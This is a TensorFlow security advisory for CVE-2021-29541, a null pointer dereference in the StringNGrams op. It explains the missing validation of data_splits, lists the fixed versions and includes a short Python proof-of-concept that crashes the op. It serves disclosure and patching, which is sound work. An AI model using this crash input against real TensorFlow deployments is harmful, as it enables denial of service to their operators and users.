## TFSA-2021-030: Null pointer dereference in `StringNGrams`

### CVE Number
CVE-2021-29541

### Impact
An attacker can trigger a dereference of a null pointer in
`tf.raw_ops.StringNGrams`:

```python
import tensorflow as tf

data=tf.constant([''] * 11, shape=[11], dtype=tf.string)

splits = [0]*115
splits.append(3)
data_splits=tf.constant(splits, shape=[116], dtype=tf.int64)

tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss',
                        ngram_widths=[7,6,11],
                        left_pad='ABCDE', right_pad=b'ZYXWVU',
                        pad_width=50, preserve_short_sequences=True)
```

This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L67-L74)
does not fully validate the `data_splits` argument. This would result in
[`ngrams_data`](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L106-L110)
to be a null pointer when the output would be computed to have 0 or negative
size.

Later writes to the output tensor would then cause a null pointer dereference.

### Patches
We have patched the issue in GitHub commit
[ba424dd8f16f7110eea526a8086f1a155f14f22b](https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b).

The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
